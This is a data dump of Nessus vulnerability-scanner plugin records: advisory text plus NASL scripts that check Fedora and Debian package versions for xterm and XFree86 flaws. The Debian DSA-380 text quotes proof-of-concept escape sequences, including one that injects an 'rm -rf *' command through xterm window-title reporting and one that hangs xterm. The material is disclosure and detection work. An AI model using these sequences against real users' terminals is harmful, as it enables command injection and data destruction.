"2023-11-28T16:25:10", "description": "This update fixes the following security issue: CRLF injection vulnerability in xterm allows user-assisted attackers to execute arbitrary commands via LF (aka \\n) characters surrounding a command name within a Device Control Request Status String (DECRQSS) escape sequence in a text file, a related issue to CVE-2003-0063 and CVE-2003-0071.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-04-23T00:00:00", "type": "nessus", "title": "Fedora 10 : xterm-238-1.fc10 (2009-0091)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0063", "CVE-2003-0071"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xterm", "cpe:/o:fedoraproject:fedora:10"], "id": "FEDORA_2009-0091.NASL", "href": "https://www.tenable.com/plugins/nessus/36641", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-0091.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36641);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2009-0091\");\n\n script_name(english:\"Fedora 10 : xterm-238-1.fc10 (2009-0091)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issue: CRLF injection\nvulnerability in xterm allows user-assisted attackers to execute\narbitrary commands via LF (aka \\n) characters surrounding a command\nname within a Device Control Request Status String (DECRQSS) escape\nsequence in a text file, a related issue to CVE-2003-0063 and\nCVE-2003-0071.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=479000\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-January/018550.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5058f2b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xterm package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xterm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^10([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 10.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC10\", reference:\"xterm-238-1.fc10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xterm\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:19:04", "description": "#use wml::fmt::verbatim\n\nFour vulnerabilities have been discovered in XFree86.\n\n - CAN-2003-0063- xterm window title reporting escape sequence can deceive user The xterm package provides a terminal escape sequence that reports the window title by injecting it into the input buffer of the terminal window, as if the user had typed it. An attacker can craft an escape sequence that sets the title of a victim's xterm window to an arbitrary string (such as a shell command) and then reports that title. If the victim is at a shell prompt when this is done, the injected command will appear on the command line, ready to be run. Since it is not possible to embed a carriage return in the window title, the attacker would have to convince the victim to press Enter (or rely upon the victim's careless or confusion) for the shell or other interactive process to interpret the window title as user input. It is conceivable that the attacker could craft other escape sequences that might convince the victim to accept the injected input, however. The Common Vulnerabilities and Exposures project at cve.mitre.org has assigned the name CAN-2003-0063 to this issue.\n\n To determine whether your version of xterm is vulnerable to abuse of the window title reporting feature, run the following command at a shell prompt from within an xterm window :\n\n echo -e '\\e[21t'\n\n (The terminal bell may ring, and the window title may be prefixed with an 'l'.)\n\n This flaw is exploitable by anything that can send output to a terminal window, such as a text document. The xterm user has to take action to cause the escape sequence to be sent, however (such as by viewing a malicious text document with the 'cat' command). Whether you are likely to be exposed to it depends on how you use xterm.\n Consider the following :\n\n echo -e '\\e]2;s && echo rm -rf *\\a' > /tmp/sploit echo -e '\\e[21t' >> /tmp/sploit cat /tmp/sploit\n\n Debian has resolved this problem by disabling the window title reporting escape sequence in xterm; it is understood but ignored.\n The escape sequence to set the window title has not been disabled.\n\n A future release of the xterm package will have a configuration option to permit the user to turn the window title reporting feature back on, but it will default off.\n\n - CAN-2003-0071- xterm susceptible to DEC UDK escape sequence denial-of-service attack\n\n The xterm package, since it emulates DEC VT-series text terminals, emulates a feature of DEC VT terminals known as 'User-Defined Keys' (UDK for short). There is a bug in xterm's handling of DEC UDK escape sequences, however, and an ill-formed one can cause the xterm process to enter a tight loop. This causes the process to 'spin', consuming CPU cycles uselessly, and refusing to handle signals (such as efforts to kill the process or close the window).\n\n To determine whether your version of xterm is vulnerable to this attack, run the following command at a shell prompt from within a 'sacrificial' xterm window (i.e., one that doesn't have anything in the scrollback buffer you might need to see later) :\n\n echo -e '\\eP0;0|0A/17\\x9c'\n\n This flaw is exploitable by anything that can send output to a terminal window, such as a text document. The xterm user has to take action to cause the escape sequence to be sent, however (such as by viewing a malicious text document with the 'cat' command). Whether you are likely to be exposed to it depends on how you use xterm.\n\n Debian has resolved this problem by backporting an upstream fix to XFree86 4.1.0.\n\n - CAN-2002-0164- flaw in X server's MIT-SHM extension permits user owning X session to read and write arbitrary shared memory segments\n\n Most X servers descended from the MIT/X Consortium/X.Org Sample Implementation, including XFree86's X servers, support an extension to the X protocol called MIT-SHM, which enables X clients running on the same host as the X server to operate more quickly and efficiently by taking advantage of an operating system feature called shared memory where it is available. The Linux kernel, for example, supports shared memory.\n\n Because the X server runs with elevated privileges, the operating system's built-in access control mechanisms are ineffective to police the X server's usage of segments of shared memory. The X server has to implement its own access control. This was imperfectly done in previous releases of XFree86 (and the MIT/X Consortium/X.Org Sample Implementation before it), leaving opportunities for malicious X clients to read and alter shared memory segments to which they should not have access. The Common Vulnerabilities and Exposures project at cve.mitre.org has assigned the name CAN-2002-0164 to this issue.\n\n Debian's XFree86 4.1.0-16 packages shipped with an incomplete fix for the this flaw, only enforcing proper access control for X servers that were not started by a display manager (e.g., xdm). This update resolves that problem.\n\n The Debian Project knows of no exploits for this vulnerability. A malicious X client that abused the MIT-SHM extension could conceivably be written however, and run (deliberately or unwittingly) by a user able to run an X server on a host. The impact of this flaw depends on how shared memory is used on the system. See the ipcs(8) manual page for more information.\n\n Debian has resolved this problem by backporting an upstream fix to XFree86 4.1.0.\n\n - CAN-2003-0730- multiple integer overflows in the font libraries for XFree86 allow local or remote attackers to cause a denial of service or execute arbitrary code via heap-based and stack-based buffer overflow attacks\n\n Security researcher 'blexim' wrote [paraphrased] :\n\n I have identified several bugs in the font libraries of the current version of the XFree86 source code. These bugs could potentially lead to the execution of arbitrary code by a remote user in any process which calls the functions in question. The functions are related to the transfer and enumeration of fonts from font servers to clients, limiting the range of the exposure caused by these bugs.\n\n Specifically, several sizing variables passed from a font server to a client are not adequately checked, causing calculations on them to result in erroneous values. These erroneous calculations can lead to buffers on the heap and stack overflowing, potentially leading to arbitrary code execution. As stated before, the risk is limited by the fact that only clients can be affected by these bugs, but in some (non-default) configurations, both xfs and the X server can act as clients to remote font servers. In these configurations, both xfs and the X server could be potentially compromised.\n\n The Common Vulnerabilities and Exposures project at cve.mitre.org has assigned the name CAN-2003-0730 to this issue.\n\n The Debian Project knows of no exploits for this vulnerability. By default in Debian, X servers are configured to listen only to a locally-running font server, which is not even used if the xfs package is not installed. The Debian default configuration of xfs uses only font directories on the local host, and does not attempt to connect to any external font servers.\n\n Debian has resolved this problem by backporting an upstream fix to XFree86 4.1.0.\n\nAll of the above problems also affect the xfree86v3 packages (in the case of the first two flaws, the xterm source code contains the flaws, but no xterm package is produced). Due to resource limitations and a lack of upstream support for this legacy code, Debian is unable to continue supporting version 3.3.6 of XFree86. To avoid exposure to the latter two flaws in this advisory, we recommend that you remove the following packages if you have them installed :\n\n - xserver-3dlabs\n - xserver-8514\n\n - xserver-agx\n\n - xserver-common-v3\n\n - xserver-fbdev\n\n - xserver-i128\n\n - xserver-mach32\n\n - xserver-mach64\n\n - xserver-mach8\n\n - xserver-mono\n\n - xserver-p9000\n\n - xserver-s3\n\n - xserver-s3v\n\n - xserver-svga\n\n - xserver-tga\n\n - xserver-vga16\n\n - xserver-w32\n\n(You may also wish to remove the xext, xlib6, and xlib6-altdev packages, as support for them is being terminated along with the rest of the XFree86 3.3.6 packages, though they are not affected by the flaws in this advisory.)", "cvss3": {}, "published": "2004-09-29T00:00:00", "type": "nessus", "title": "Debian DSA-380-1 : xfree86 - buffer overflows, denial of service", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2002-0164", "CVE-2003-0063", "CVE-2003-0071", "CVE-2003-0079", "CVE-2003-0730"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:xfree86", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-380.NASL", "href": "https://www.tenable.com/plugins/nessus/15217", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-380. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15217);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2002-0164\", \"CVE-2003-0063\", \"CVE-2003-0071\", \"CVE-2003-0079\", \"CVE-2003-0730\");\n script_bugtraq_id(4396, 6940, 6950, 8514);\n script_xref(name:\"DSA\", value:\"380\");\n\n script_name(english:\"Debian DSA-380-1 : xfree86 - buffer overflows, denial of service\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"#use wml::fmt::verbatim\n\nFour vulnerabilities have been discovered in XFree86.\n\n - CAN-2003-0063- xterm window title reporting escape\n sequence can deceive user\n The xterm package provides a terminal escape sequence\n that reports the window title by injecting it into the\n input buffer of the terminal window, as if the user had\n typed it. An attacker can craft an escape sequence that\n sets the title of a victim's xterm window to an\n arbitrary string (such as a shell command) and then\n reports that title. If the victim is at a shell prompt\n when this is done, the injected command will appear on\n the command line, ready to be run. Since it is not\n possible to embed a carriage return in the window title,\n the attacker would have to convince the victim to press\n Enter (or rely upon the victim's careless or confusion)\n for the shell or other interactive process to interpret\n the window title as user input. It is conceivable that\n the attacker could craft other escape sequences that\n might convince the victim to accept the injected input,\n however. The Common Vulnerabilities and Exposures\n project at cve.mitre.org has assigned the name\n CAN-2003-0063 to this issue.\n\n To determine whether your version of xterm is vulnerable to abuse of\n the window title reporting feature, run the following command at a\n shell prompt from within an xterm window :\n\n echo -e '\\e[21t'\n\n (The terminal bell may ring, and the window title may be prefixed\n with an 'l'.)\n\n This flaw is exploitable by anything that can send output to a\n terminal window, such as a text document. The xterm user has to take\n action to cause the escape sequence to be sent, however (such as by\n viewing a malicious text document with the 'cat' command). Whether\n you are likely to be exposed to it depends on how you use xterm.\n Consider the following :\n\n echo -e '\\e]2;s && echo rm -rf *\\a' > /tmp/sploit echo -e '\\e[21t'\n >> /tmp/sploit cat /tmp/sploit\n\n Debian has resolved this problem by disabling the window title\n reporting escape sequence in xterm; it is understood but ignored.\n The escape sequence to set the window title has not been disabled.\n\n A future release of the xterm package will have a configuration\n option to permit the user to turn the window title reporting feature\n back on, but it will default off.\n\n - CAN-2003-0071- xterm susceptible to DEC UDK escape\n sequence denial-of-service attack\n\n The xterm package, since it emulates DEC VT-series text\n terminals, emulates a feature of DEC VT terminals known\n as 'User-Defined Keys' (UDK for short). There is a bug\n in xterm's handling of DEC UDK escape sequences,\n however, and an ill-formed one can cause the xterm\n process to enter a tight loop. This causes the process\n to 'spin', consuming CPU cycles uselessly, and refusing\n to handle signals (such as efforts to kill the process\n or close the window).\n\n To determine whether your version of xterm is vulnerable to this\n attack, run the following command at a shell prompt from within a\n 'sacrificial' xterm window (i.e., one that doesn't have anything in\n the scrollback buffer you might need to see later) :\n\n echo -e '\\eP0;0|0A/17\\x9c'\n\n This flaw is exploitable by anything that can send output to a\n terminal window, such as a text document. The xterm user has to take\n action to cause the escape sequence to be sent, however (such as by\n viewing a malicious text document with the 'cat' command). Whether\n you are likely to be exposed to it depends on how you use xterm.\n\n Debian has resolved this problem by backporting an upstream fix to\n XFree86 4.1.0.\n\n - CAN-2002-0164- flaw in X server's MIT-SHM extension\n permits user owning X session to read and write\n arbitrary shared memory segments\n\n Most X servers descended from the MIT/X Consortium/X.Org\n Sample Implementation, including XFree86's X servers,\n support an extension to the X protocol called MIT-SHM,\n which enables X clients running on the same host as the\n X server to operate more quickly and efficiently by\n taking advantage of an operating system feature called\n shared memory where it is available. The Linux kernel,\n for example, supports shared memory.\n\n Because the X server runs with elevated privileges, the operating\n system's built-in access control mechanisms are ineffective to\n police the X server's usage of segments of shared memory. The X\n server has to implement its own access control. This was imperfectly\n done in previous releases of XFree86 (and the MIT/X Consortium/X.Org\n Sample Implementation before it), leaving opportunities for\n malicious X clients to read and alter shared memory segments to\n which they should not have access. The Common Vulnerabilities and\n Exposures project at cve.mitre.org has assigned the name\n CAN-2002-0164 to this issue.\n\n Debian's XFree86 4.1.0-16 packages shipped with an incomplete fix\n for the this flaw, only enforcing proper access control for X\n servers that were not started by a display manager (e.g., xdm). This\n update resolves that problem.\n\n The Debian Project knows of no exploits for this vulnerability. A\n malicious X client that abused the MIT-SHM extension could\n conceivably be written however, and run (deliberately or\n unwittingly) by a user able to run an X server on a host. The impact\n of this flaw depends on how shared memory is used on the system. See\n the ipcs(8) manual page for more information.\n\n Debian has resolved this problem by backporting an upstream fix to\n XFree86 4.1.0.\n\n - CAN-2003-0730- multiple integer overflows in the font\n libraries for XFree86 allow local or remote attackers to\n cause a denial of service or execute arbitrary code via\n heap-based and stack-based buffer overflow attacks\n\n Security researcher 'blexim' wrote [paraphrased] :\n\n I have identified several bugs in the font libraries of the\n current version of the XFree86 source code. These bugs could\n potentially lead to the execution of arbitrary code by a remote\n user in any process which calls the functions in question. The\n functions are related to the transfer and enumeration of fonts\n from font servers to clients, limiting the range of the exposure\n caused by these bugs.\n\n Specifically, several sizing variables passed from a font server\n to a client are not adequately checked, causing calculations on\n them to result in erroneous values. These erroneous calculations\n can lead to buffers on the heap and stack overflowing, potentially\n leading to arbitrary code execution. As stated before, the risk is\n limited by the fact that only clients can be affected by these\n bugs, but in some (non-default) configurations, both xfs and the X\n server can act as clients to remote font servers. In these\n configurations, both xfs and the X server could be potentially\n compromised.\n\n The Common Vulnerabilities and Exposures project at cve.mitre.org\n has assigned the name CAN-2003-0730 to this issue.\n\n The Debian Project knows of no exploits for this vulnerability. By\n default in Debian, X servers are configured to listen only to a\n locally-running font server, which is not even used if the xfs\n package is not installed. The Debian default configuration of xfs\n uses only font directories on the local host, and does not attempt\n to connect to any external font servers.\n\n Debian has resolved this problem by backporting an upstream fix to\n XFree86 4.1.0.\n\nAll of the above problems also affect the xfree86v3 packages (in the\ncase of the first two flaws, the xterm source code contains the flaws,\nbut no xterm package is produced). Due to resource limitations and a\nlack of upstream support for this legacy code, Debian is unable to\ncontinue supporting version 3.3.6 of XFree86. To avoid exposure to the\nlatter two flaws in this advisory, we recommend that you remove the\nfollowing packages if you have them installed :\n\n - xserver-3dlabs\n - xserver-8514\n\n - xserver-agx\n\n - xserver-common-v3\n\n - xserver-fbdev\n\n - xserver-i128\n\n - xserver-mach32\n\n - xserver-mach64\n\n - xserver-mach8\n\n - xserver-mono\n\n - xserver-p9000\n\n - xserver-s3\n\n - xserver-s3v\n\n - xserver-svga\n\n - xserver-tga\n\n - xserver-vga16\n\n - xserver-w32\n\n(You may also wish to remove the xext, xlib6, and xlib6-altdev\npackages, as support for them is being terminated along with the rest\nof the XFree86 3.3.6 packages, though they are not affected by the\nflaws in this advisory.)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-380\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"For the stable distribution (woody) these problems have been fixed in\nversion 4.1.0-16woody1.\n\nWe recommend that you update your xfree86 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xfree86\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"lbxproxy\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libdps-dev\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libdps1\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libdps1-dbg\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libxaw6\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libxaw6-dbg\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libxaw6-dev\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libxaw7\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libxaw7-dbg\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libxaw7-dev\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"proxymngr\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"twm\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"x-window-system\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"x-window-system-core\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xbase-clients\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xdm\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xfonts-100dpi\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xfonts-100dpi-transcoded\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xfonts-75dpi\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xfonts-75dpi-transcoded\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xfonts-base\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xfonts-base-transcoded\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xfonts-cyrillic\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xfonts-pex\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xfonts-scalable\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xfree86-common\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xfs\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xfwp\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xlib6g\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xlib6g-dev\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xlibmesa-dev\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xlibmesa3\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xlibmesa3-dbg\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xlibosmesa-dev\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xlibosmesa3\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xlibosmesa3-dbg\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xlibs\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xlibs-dbg\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xlibs-dev\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xlibs-pic\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xmh\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xnest\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xprt\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xserver-common\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xserver-xfree86\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xspecs\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xterm\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xutils\", reference:\"4.1.0-16woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"xvfb\", reference:\"4.1.0-16woody1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-15T13:32:09", "description": "The remote Fedora 37 host has a package installed that is affected by a vulnerability as referenced in the FEDORA-2023-3746647cc3 advisory.\n\n - CRLF injection vulnerability in xterm allows user-assisted attackers to execute arbitrary commands via LF (aka \\n) characters surrounding a command name within a Device Control Request Status String (DECRQSS) escape sequence in a text file, a related issue to CVE-2003-0063 and CVE-2003-0071. (CVE-2008-2383)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-07-27T00:00:00", "type": "nessus", "title": "Fedora 37 : kitty (2023-3746647cc3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0063", "CVE-2003-0071", "CVE-2008-2383"], "modified": "2023-07-27T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:37", "p-cpe:/a:fedoraproject:fedora:kitty"], "id": "FEDORA_2023-3746647CC3.NASL", "href": "https://www.tenable.com/plugins/nessus/178936", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from Fedora Security Advisory FEDORA-2023-3746647cc3\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(178936);\n script_version(\"1.0\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/27\");\n\n script_cve_id(\"CVE-2008-2383\");\n script_xref(name:\"FEDORA\", value:\"2023-3746647cc3\");\n\n script_name(english:\"Fedora 37 : kitty (2023-3746647cc3)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Fedora 37 host has a package installed that is affected by a vulnerability as referenced in the\nFEDORA-2023-3746647cc3 advisory.\n\n - CRLF injection vulnerability in xterm allows user-assisted attackers to execute arbitrary commands via LF\n (aka \\n) characters surrounding a command name within a Device Control Request Status String (DECRQSS)\n escape sequence in a text file, a related issue to CVE-2003-0063 and CVE-2003-0071. (CVE-2008-2383)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2023-3746647cc3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kitty package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2008-2383\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/07/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kitty\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = 